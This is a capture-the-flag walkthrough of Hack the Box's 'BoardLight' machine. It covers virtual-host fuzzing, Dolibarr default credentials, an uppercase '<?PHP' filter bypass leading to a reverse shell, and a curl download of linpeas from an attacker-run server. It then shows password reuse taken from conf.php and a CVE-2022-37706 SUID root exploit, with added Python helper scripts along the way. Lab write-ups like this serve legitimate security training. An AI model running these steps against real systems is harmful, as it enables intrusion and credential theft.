Hi Everyone, we will be doing BoardLight from Hack the Box as we continue our TJNull list journey. Enjoy!
1) First, I started off by enumerating the open ports on the target machine:
nmap -sC -sV -A -T4 <TARGET_IP>
Not a lot happening here: only two ports open so far. Let’s dive into the web server running on port 80, as we don’t have any credentials for SSH yet.
2) I edited the /etc/hosts file and added “boardlight.htb” as the hostname. The website looks pretty basic; after a little manual enumeration I performed directory enumeration with dirsearch and ffuf, as well as subdomain enumeration with ffuf.
2.1) Surprisingly, neither directory enumeration nor subdomain enumeration found anything interesting. I decided to take a step back and enumerate the website manually a little more.
2.2) I realized that the footer of the website suggests the hostname should be board.htb. That shouldn’t have an impact on directory busting, but it can have an impact on subdomain enumeration: name-based virtual hosts are selected by the Host header, so fuzzing under the wrong base domain will never match a vhost the server actually knows. I decided to give it a try, as I didn’t have any better idea at the moment.
2.3) I quickly edited /etc/hosts and replaced boardlight.htb with board.htb. After that I ran the subdomain fuzzing with ffuf again:
ffuf -w /usr/share/seclists/SecLists-master/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.board.htb" -u http://10.10.11.11
Bingo! We got one hit: crm. (I used the -fw flag to filter the results by word count, which is very useful for seeing only true positives. The command above is shown without the filter: run it once unfiltered, note the word count of the default response that every non-existent subdomain returns, then pass that number to -fw.)
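The filtering trick above relies on one fact: the default virtual host answers every unknown Host header with the same page, so anything that differs from that baseline is a real vhost. The script below reimplements that logic in Python so the baseline step is explicit; it is an added example, not part of the original writeup or of ffuf. The function names are mine, the fetcher uses urllib with an overridden Host header, and the test data (a default page and a login page) is constructed.

```python
"""Virtual-host fuzzing with baseline (word-count) filtering.

Added example, not from the original writeup. Mirrors what
`ffuf -H "Host: FUZZ.board.htb" -fw <n>` does: measure the default vhost
once, then report only hostnames whose response differs from it.
"""
import sys
import urllib.error
import urllib.request
from typing import Callable, Iterable

# A fetcher maps a Host header value to (HTTP status, response body).
Fetch = Callable[[str], tuple[int, str]]


def http_fetch(target_url: str, timeout: float = 5.0) -> Fetch:
    """Build a fetcher that GETs target_url (e.g. http://10.10.11.11/) with an overridden Host header."""
    def fetch(host: str) -> tuple[int, str]:
        req = urllib.request.Request(target_url, headers={"Host": host, "User-Agent": "vhost-fuzz"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status, resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:  # 4xx/5xx responses still carry a body worth measuring
            return err.code, err.read().decode("utf-8", "replace")
    return fetch


def word_count(body: str) -> int:
    """Same metric as ffuf's -fw: number of whitespace-separated words in the body."""
    return len(body.split())


def measure_baseline(fetch: Fetch, domain: str, probe: str = "zz-not-a-real-vhost") -> tuple[int, int]:
    """Request a hostname that certainly does not exist to learn what the default vhost looks like."""
    status, body = fetch(f"{probe}.{domain}")
    return status, word_count(body)


def fuzz_vhosts(fetch: Fetch, domain: str, words: Iterable[str]) -> list[tuple[str, int, int]]:
    """Return (host, status, words) for every candidate whose response differs from the baseline."""
    base = measure_baseline(fetch, domain)
    hits = []
    for word in words:
        host = f"{word}.{domain}"
        status, body = fetch(host)
        signature = (status, word_count(body))
        if signature != base:
            hits.append((host, signature[0], signature[1]))
    return hits


if __name__ == "__main__":
    # usage: python3 vhost_fuzz.py http://10.10.11.11/ board.htb subdomains-top1million-5000.txt
    url, domain, wordlist = sys.argv[1:4]
    with open(wordlist, encoding="utf-8", errors="ignore") as fh:
        candidates = (line.strip() for line in fh if line.strip())
        for host, status, words in fuzz_vhosts(http_fetch(url), domain, candidates):
            print(f"{host}  [status {status}, words {words}]")
```

Run against the wrong base domain (boardlight.htb) every candidate hits the default vhost and nothing differs from the baseline, which is exactly why the earlier fuzzing run came back empty; with board.htb the crm hostname stands out by its different word count.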
2.4) I edited /etc/hosts again, adding crm.board.htb, and navigated to it: there is a login page, interesting!
2.5) From here we can see that the software version (Dolibarr 17.0.0) is disclosed, which definitely looks interesting, but before we go that route I always like to check for default credentials:
2.6) And it works! Amazing, we are in as an administrator:
3) From here I did some Google-fu and researched available exploits for this version, 17.0.0, of Dolibarr.
3.1) I ended up finding this amazing article describing an RCE vulnerability in Dolibarr: https://www.swascan.com/security-advisory-dolibarr-17-0-0/. There are many scripts on GitHub that automate the exploitation and the reverse shell, but I wanted to really understand what is happening here and why RCE is possible, so I went that route.
3.2) It’s important to mention that Dolibarr lets an administrator create websites and add web pages to them, and that the application itself is written in PHP.
For example, you can create a website and, within an HTML page, put something simple to test it out:
<h1>Beekeeper was here </h1>
3.3) Okay, back to the article: if we try to execute PHP code with a lowercase <?php tag, we get an error message:
3.4) But if we write the tag in uppercase, <?PHP, we get arbitrary code execution, because the check that is supposed to block PHP only matches the lowercase tag:
<?PHP echo 2+2;?>
If we click Preview in the top-right corner we can see 4 as the result, great!
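To make the bug class behind the bypass concrete, here is a case-sensitive denylist beside a hardened version, written in Python as an added illustration; it is not Dolibarr’s code and not part of the original writeup. It assumes, as the advisory describes, that the original check looked only for the lowercase open tag; the function names and the extra payload variants are mine.

```python
"""Case-sensitive PHP tag filtering and its bypass.

Added illustration of the bug class, not Dolibarr's code. The vulnerable
check rejects only a lowercase "<?php"; the hardened one rejects every
spelling of a PHP open tag.
"""
import re

# The payloads used in the walkthrough, plus two more variants of the same idea.
HTML_ONLY = "<h1>Beekeeper was here </h1>"
LOWER_TAG = "<?php echo 2+2;?>"
UPPER_TAG = "<?PHP echo 2+2;?>"
ECHO_TAG = "<?= 2+2 ?>"                       # short echo tag, also never "<?php"
MIXED_TAG = "<?Php echo 2+2;?>"


def vulnerable_allows(page: str) -> bool:
    """Block pages containing a lowercase '<?php' only (the pattern the advisory bypasses)."""
    return "<?php" not in page


PHP_OPEN_TAG = re.compile(
    r"<\?"                                          # '<?php', '<?PHP', '<?=' and the bare short tag
    r"|<script\b[^>]*\blanguage\s*=\s*[\"']?php",   # legacy <script language="php"> form (PHP < 7)
    re.IGNORECASE,
)


def hardened_allows(page: str) -> bool:
    """Block any PHP open tag regardless of case. Also blocks '<?xml' prologs, an acceptable
    trade-off for user-authored HTML fragments."""
    return PHP_OPEN_TAG.search(page) is None


def bypasses(allow, payloads):
    """Return the payloads a given filter lets through; useful when comparing filters."""
    return [p for p in payloads if allow(p)]


if __name__ == "__main__":
    payloads = [HTML_ONLY, LOWER_TAG, UPPER_TAG, ECHO_TAG, MIXED_TAG]
    print("vulnerable filter allows:", bypasses(vulnerable_allows, payloads))
    print("hardened filter allows:  ", bypasses(hardened_allows, payloads))
```

A denylist like the hardened one only narrows the problem; the real fix is not to evaluate user-authored page content as PHP at all unless the author is explicitly trusted to run code on the server.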
3.5) Let’s do one more test:
3.6) Okay, nice, we have RCE; let’s leverage it to get a reverse shell.
Since we are dealing with PHP, I will use Pentest Monkey’s PHP reverse shell, which can be generated at https://www.revshells.com/
3.7) Simply put the PHP code from the script inside the HTML page (don’t forget to change the php tags to uppercase), then start a netcat listener.
Finally, click Preview on the page containing the PHP payload, and we get a shell as www-data!
4) I transferred linpeas right away to speed up the enumeration, but I didn’t find anything useful in the output at that point:
4.1) Start a Python web server on your attacker machine:
python3 -m http.server 8000
4.2) Transfer linpeas to the remote host using curl (lowercase -o takes the output file name; uppercase -O takes no argument and would treat a following file name as a second URL):
curl "http://10.10.10.10:8000/linpeas.sh" -o linpeas.sh
4.3) I will keep linpeas on the remote host in case I need it later.
4.4) Moving on to further enumeration: I know that Dolibarr is running on the remote host, and linpeas found a database listening on port 3306, so I decided to enumerate it further. As I don’t have any credentials at the moment, let’s look up where Dolibarr keeps its database config file and how to connect to it.
I found the Dolibarr wiki page, which says we are looking for conf.php (kept under htdocs/conf/ in the Dolibarr install). Before looking for the configuration file, I decided to try the default credentials dolibarr:dolibarr:
mysql -h 127.0.0.1 -P 3306 -u dolibarr -p
That didn’t work out.
4.5) Okay, in that case let’s see if we can find conf.php:
Great, we found conf.php and within it the username and password for the Dolibarr database running on localhost. However, if I try to connect to the MySQL service with them I still get access denied. Hm…
4.6) What about password reuse? I know from my initial enumeration that there is a user larissa on the target machine, so let’s try to connect as larissa over SSH on port 22 with the password from conf.php. Bingo!
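The two steps above, pulling the credentials out of conf.php and then deciding whom to try them against, are mechanical enough to script. The snippet below is an added example, not part of the original writeup or of Dolibarr: it parses the $dolibarr_main_* assignments that Dolibarr writes to htdocs/conf/conf.php (the variable names are Dolibarr’s, the values are invented), picks the accounts from /etc/passwd that can actually log in, and emits the (service, user, password) pairs worth trying. The sample conf.php and passwd excerpt are constructed for the example; the function names are mine.

```python
"""Extract DB credentials from a Dolibarr conf.php and list password-reuse candidates.

Added example, not from the original writeup. The $dolibarr_main_* variable
names are the ones Dolibarr uses in htdocs/conf/conf.php; every value below
is invented for the example.
"""
import re

# Constructed sample in the shape of conf.php (note the escaped quote in the password).
SAMPLE_CONF = r"""<?php
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_user='dolibarr_app';
$dolibarr_main_db_pass='S3cret$Db\'Pass';
$dolibarr_main_db_type='mysqli';
"""

# Constructed /etc/passwd excerpt.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:111:117:MySQL Server:/nonexistent:/bin/false
larissa:x:1000:1000:larissa:/home/larissa:/bin/bash
"""

# $name = 'value';  or  $name = "value";  with backslash escapes inside the quotes allowed.
ASSIGN = re.compile(r"""^\s*\$(dolibarr_main_\w+)\s*=\s*(['"])((?:\\.|(?!\2).)*)\2\s*;""", re.M)
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}


def parse_conf(text: str) -> dict[str, str]:
    """Return every $dolibarr_main_* assignment; only \\\\ and \\<quote> are unescaped, as in PHP."""
    conf = {}
    for name, quote, value in ASSIGN.findall(text):
        conf[name] = re.sub(rf"\\([\\{quote}])", r"\1", value)
    return conf


def login_users(passwd: str) -> list[str]:
    """Accounts with a real shell: root plus ordinary users (uid >= 1000)."""
    users = []
    for line in passwd.splitlines():
        parts = line.split(":")
        if len(parts) < 7:
            continue
        name, uid, shell = parts[0], int(parts[2]), parts[6]
        if shell not in NOLOGIN_SHELLS and (uid == 0 or uid >= 1000):
            users.append(name)
    return users


def reuse_candidates(conf: dict[str, str], passwd: str) -> list[tuple[str, str, str]]:
    """(service, user, password) to try: the database itself first, then every shell user with the same password."""
    password = conf.get("dolibarr_main_db_pass", "")
    if not password:
        return []
    host = conf.get("dolibarr_main_db_host", "localhost")
    port = conf.get("dolibarr_main_db_port", "3306")
    candidates = [(f"mysql://{host}:{port}", conf.get("dolibarr_main_db_user", ""), password)]
    candidates += [("ssh", user, password) for user in login_users(passwd)]
    return candidates


if __name__ == "__main__":
    # On the target: python3 this.py after pasting the real conf.php / /etc/passwd contents in place of the samples.
    for service, user, password in reuse_candidates(parse_conf(SAMPLE_CONF), SAMPLE_PASSWD):
        print(f"{service:<24} {user:<14} {password}")
```

Handling the escaped quote matters in practice: passwords with $ or ' in them are common, and a naive split on the quote character silently truncates them, which is one way a valid password can appear "not to work" against MySQL or SSH.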
5) We got user.txt. Let’s move on to privilege escalation. My initial enumeration, such as checking whether we can run any commands with sudo and checking the kernel version, didn’t yield anything interesting. I decided to give the linpeas we transferred earlier a try.
5.1) In the SUID section of the linpeas output I found something interesting: SUID binaries that are not common and that I wasn’t familiar with:
5.2) A quick Google search for enlightenment led me to CVE-2022-37706, which looks promising given that the SUID bit is set on enlightenment here. The GitHub repo is very well formatted and the exploitation path is well documented; I will leave it here in case you want to find out more about this CVE. The binary we are interested in is enlightenment_sys.
5.3) From the linpeas output we can see that the SUID bit is set on enlightenment_sys, which is great. I downloaded exploit.sh from https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit and transferred it to the target machine.
5.4) Executing the bash script was enough to get a root shell. Awesome, GG!
Lessons Learned
1) An interesting subdomain enumeration lesson: the base hostname in /etc/hosts (and therefore in the Host header you fuzz with) has to be the right one, here the one found in the website footer. Name-based virtual hosts are picked by the Host header, so the correct hostname plays an important role in subdomain enumeration even though it makes no difference to directory busting.
2) Password reuse is always a nice attack vector. Here I found the Dolibarr database password in conf.php, but it didn’t work when I tried to connect to the MySQL database on port 3306. With further enumeration I found a user larissa on the machine; with port 22 open, I tried SSH as larissa with the password from conf.php, and it worked. Always check for possible password reuse.
3) Read the linpeas output carefully, as every detail matters. If we had just skimmed it we would have missed those uncommon SUID binaries and thus the intended privilege escalation path. This is also how I learned about a CVE that was new to me: CVE-2022-37706.